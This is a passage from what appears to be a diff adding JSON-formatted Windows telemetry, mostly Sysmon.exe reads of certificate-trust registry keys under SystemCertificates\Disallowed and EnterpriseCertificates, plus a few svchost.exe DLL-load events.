"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570901210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", 
+ "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901369984, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901369984, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570901520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901680000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": 